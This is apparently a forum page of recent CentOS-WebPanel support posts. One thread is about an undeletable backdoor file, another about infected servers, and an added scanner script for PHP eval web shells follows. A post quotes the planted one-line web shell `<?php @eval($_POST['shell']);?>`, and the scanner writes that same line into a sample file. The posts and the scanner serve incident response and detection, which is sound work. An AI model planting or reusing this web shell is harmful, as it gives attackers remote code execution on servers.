1
CentOS-WebPanel Bugs / Re: Cannot Delete File
« Last post by Starburst on Today at 04:18:03 AM »
Ditto to what @overseer posted.
On our AL9 servers, there is no error.php in usr/local/cwpsrv/htdocs/admin/admin
1 other thing you can try is go to User Accounts -> Fix Permissions -> Select User (nobody), click on all 3 boxes, and then the blue bar 'Fix Selected Issues'
2
CentOS-WebPanel Bugs / Re: Cannot Delete File
« Last post by Bijan on July 17, 2025, 01:07:43 AM »
That did not work. I have removed the I(mmutable) and e(xtent) flags. lsattr returns --------------.
3
CentOS-WebPanel Bugs / Re: Cannot Delete File
« Last post by overseer on July 17, 2025, 12:44:52 AM »
Not present on any servers I manage (one CentOS 7.9 holdout, a couple of AlmaLinux 8 servers, a couple of AL9 test beds).
Try to see if the immutable bit is set, then remove:
```
chattr -i error.php
rm -rf error.php
```
4
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« Last post by Bijan on July 17, 2025, 12:22:28 AM »
I just saw I was affected by this issue. The php file was in each of my /home/ directories' public_html folder. The modified date for the file was July 6 but my CWPpro version is currently 0.9.8.1207. Is there a way to find out exactly when this version was released?
5
CentOS-WebPanel Bugs / Cannot Delete File
« Last post by Bijan on July 17, 2025, 12:18:47 AM »
On my server running CWP, I recently found a file located in `/usr/local/cwpsrv/htdocs/admin/admin` called `error.php` that just has the contents `<?php @eval($_POST['shell']);?>` (very concerning).
```
whoami
```
returns `root`.
```
rm -rf error.php
```
returns “Permission denied.”
```
lsattr error.php
```
returns `-------------e-- error.php`.
```
getfacl error.php
```
returns:
```
# file: error.php
# owner: root
# group: root
user::rwx
group::r-x
other::r-x
```
```
mount | grep "$(df error.php | tail -1 | awk '{print $1}')"
```
returns:
`/dev/mapper/centos_centos7-root on / type ext4 (rw,relatime,data=ordered)`
This file was obviously not included with the standard cwpsrv files. What else can I do to delete this file?
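An added example, not part of any forum post above: a triage scan for the one-line `eval($_POST[...])` web shell quoted in the "Cannot Delete File" post, meant to be run over the locations the posters name. The function names, the regular expression and the sample tree are assumptions constructed for this illustration; each hit is reported with its modification time, owner, and the attribute flags of both the file and its parent directory, since unlinking a file is a write to the directory that contains it.

```shell
#!/bin/sh
# Added example (not from the thread): triage scan for one-line PHP eval() web shells.
# Assumes GNU find/grep/stat; lsattr is optional. Paths containing newlines are not handled.

# eval( applied directly to request data, e.g. @eval($_POST['x']);
WEBSHELL_RE='eval[[:space:]]*\([[:space:]]*\$_(POST|GET|REQUEST|COOKIE)'

# attrs PATH -> attribute flags as lsattr prints them, or "n/a" if unreadable
attrs() {
    a=$(lsattr -d -- "$1" 2>/dev/null | awk '{print $1}')
    printf '%s' "${a:-n/a}"
}

# scan_webshells PATH... -> one line per hit:
#   path|mtime|owner|file flags|parent directory flags
scan_webshells() {
    find "$@" -type f -name '*.php' \
        -exec grep -Eil -e "$WEBSHELL_RE" -- {} + 2>/dev/null |
    while IFS= read -r f; do
        printf '%s|%s|%s|%s|%s\n' "$f" \
            "$(stat -c '%y' -- "$f")" "$(stat -c '%U' -- "$f")" \
            "$(attrs "$f")" "$(attrs "$(dirname -- "$f")")"
    done
}

# build_sample_tree DIR -> constructed test data: one hit, two clean files
build_sample_tree() {
    d="$1/home/alice/public_html"   # hypothetical account name
    mkdir -p "$d"
    printf '%s\n' "<?php @eval(\$_POST['shell']);?>"    > "$d/error.php"
    printf '%s\n' '<?php echo "hello"; ?>'              > "$d/index.php"
    printf '%s\n' '<?php // never eval() user input ?>' > "$d/notes.php"
}

# On a CWP host, using the locations named in the posts above:
#   scan_webshells /home/*/public_html /usr/local/cwpsrv/htdocs
if [ "$#" -gt 0 ]; then scan_webshells "$@"; fi
```

An `i` or `a` in the last column means the directory itself carries the immutable or append-only flag, which `lsattr error.php` on the file alone does not show.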
6
PHP Selector / Re: I can't Change my php version 8.1 to 8.2
« Last post by overseer on July 16, 2025, 03:24:06 PM »
You just need to purchase CWP Pro (PayPal is best) and assign your license to your IP address to activate Pro.
7
Suggestions / Re: Simple editor to Master php.ini
« Last post by ylaya88 on July 16, 2025, 12:35:07 PM »
Yes, but that php.ini or user.ini is for php options and not for php extensions.
So please review the request.
I like cwp panel a lot.
8
PHP Selector / Re: I can't Change my php version 8.1 to 8.2
« Last post by it_harkat on July 16, 2025, 12:24:59 PM »
9
PHP / Re: Difference in the php views...
« Last post by venty on July 16, 2025, 09:12:06 AM »
The main php version from the CLI that you have set used by PHP Switcher is called for php info on your first case. The display is typical for a 7.x version -- CWP renders it using their stylesheet so it matches the rest of the panel. But if you have an 8.x or later, it will call the normal php.info and display it in that space.
Hi,
Thank you very much for the answer, but I updated it to a higher version of PHP - 8.1.32, and the display is the same...
I found that when I select menu PHP Settings/PHP info in the error logs, I have the following entries:
[Wed Jul 16 09:24:02.156951 2025] [security2:error] [pid 57264:tid 57296] [client 80.100.247.29:57842] ModSecurity: Warning. Unconditional match in SecAction. [file "/usr/local/apache/modsecurity-rules/owasp-crs/coreruleset-4.15.0/rules/RESPONSE-980-CORRELATION.conf"] [line "98"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=8, detection=8, per_pl=8-0-0-0, threshold=5) - (Outbound Scores: blocking=0, detection=0, per_pl=0-0-0-0, threshold=4) - (SQLI=0, XSS=0, RFI=0, LFI=0, RCE=0, PHPI=5, HTTP=0, SESS=0, COMBINED_SCORE=8)"] [ver "OWASP_CRS/4.15.0"] [tag "reporting"] [tag "OWASP_CRS"] [hostname "80.100.247.29"] [uri "/phpinfo.php"] [unique_id "aHdFgh8PEqQ3cHJu45Rg6gAAAIM"]
[Wed Jul 16 09:24:02.156739 2025] [security2:error] [pid 57264:tid 57296] [client 80.100.247.29:57842] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:blocking_inbound_anomaly_score. [file "/usr/local/apache/modsecurity-rules/owasp-crs/coreruleset-4.15.0/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "233"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score:

[Wed Jul 16 09:24:02.156378 2025] [security2:error] [pid 57264:tid 57296] [client 80.100.247.29:57842] ModSecurity: Warning. Matched phrase "phpinfo" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-rules/owasp-crs/coreruleset-4.15.0/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "339"] [id "933150"] [msg "PHP Injection Attack: High-Risk PHP Function Name Found"] [data "Matched Data: phpinfo found within REQUEST_FILENAME: /phpinfo.php"] [severity "CRITICAL"] [ver "OWASP_CRS/4.15.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/ATTACK-PHP"] [tag "capec/1000/152/242"] [hostname "80.100.247.29"] [uri "/phpinfo.php"] [unique_id "aHdFgh8PEqQ3cHJu45Rg6gAAAIM"]
[Wed Jul 16 09:24:02.155614 2025] [security2:error] [pid 57264:tid 57296] [client 80.100.247.29:57842] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/usr/local/apache/modsecurity-rules/owasp-crs/coreruleset-4.15.0/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "730"] [id "920350"] [msg "Host header is a numeric IP address"] [data "78.108.247.29"] [severity "WARNING"] [ver "OWASP_CRS/4.15.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [tag "PCI/6.5.10"] [hostname "80.100.247.29"] [uri "/phpinfo.php"] [unique_id "aHdFgh8PEqQ3cHJu45Rg6gAAAIM"]
I added the IDs to global_disabled_rules.conf, but when I select menu PHP Settings/PHP info, the display is the same and the entries appear again...
What should I do?
BR
Venty
10
CentOS 9 Problems / Unable to download files from File Manager
« Last post by thisisbsk on July 15, 2025, 09:40:37 PM »
The user panel file manager displays 'Access denied' when clicking on the download button of any file. However, the download icon is functioning properly from the admin panel file manager.
My CWP version is 0.9.8.1207 (pro) installed in CentOS Stream release 9.
The issue is present in fileManager_v2.php. But when I'm using fileManager2.php, the download option is working fine.
I tried changing the system PHP version, but it's happening for 7.1 to 8.1, all php versions. There is no error log also.
How can I debug the issue?
If we can't debug the issue, is there any way to change the link of the file manager in the user panel navigation?